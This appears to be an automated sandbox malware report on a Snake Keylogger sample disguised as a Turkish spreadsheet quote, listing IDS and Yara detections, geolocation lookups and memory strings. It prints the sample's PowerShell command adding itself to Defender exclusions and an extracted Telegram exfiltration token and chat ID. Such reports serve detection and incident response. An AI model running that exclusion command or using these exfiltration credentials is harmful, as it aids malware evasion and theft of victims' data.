Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe", ParentImage: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, ParentProcessId: 280, ParentProcessName: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe", ProcessId: 6868, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T17:10:02.190033+0200	2803305	3	Unknown Traffic	192.168.2.4	49736	188.114.97.3	443	TCP
2024-10-07T17:10:13.163208+0200	2803305	3	Unknown Traffic	192.168.2.4	49745	188.114.97.3	443	TCP
2024-10-07T17:10:16.548399+0200	2803305	3	Unknown Traffic	192.168.2.4	49753	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T17:09:59.833995+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	132.226.247.73	80	TCP
2024-10-07T17:10:01.396396+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	132.226.247.73	80	TCP
2024-10-07T17:10:08.537022+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc", "Chat_id": "-4209622687", "Version": "5.1"}

Multi AV Scanner detection for submitted file

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.0

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: aGZb.pdbSHA256 source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Source:	Binary string: aGZb.pdb source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 07238A61h	0_2_072380DE
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 0118F20Eh	3_2_0118F01F
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 0118FB98h	3_2_0118F01F
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_0118E540
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_0118EB73
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_0118ED54
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05767C4Dh	3_2_05767910
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05760FF1h	3_2_05760D48
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05766049h	3_2_05765DA0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05764EE9h	3_2_05764C40
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05766EB1h	3_2_05766C08
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05765799h	3_2_057654F0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05767761h	3_2_057674B8
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05760741h	3_2_05760498
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05764A91h	3_2_057647E8
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05766A59h	3_2_057667B0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05765BF1h	3_2_05765948
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05767309h	3_2_05767060
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 057602E9h	3_2_05760040
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05760B99h	3_2_057608F0
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05765341h	3_2_05765098
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 05764611h	3_2_05764368
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Code function: 4x nop then jmp 057664CBh	3_2_05766220

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1715367720.0000000002869000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718237504.0000000005940000.00000004.00000020.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1718259469.0000000006A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
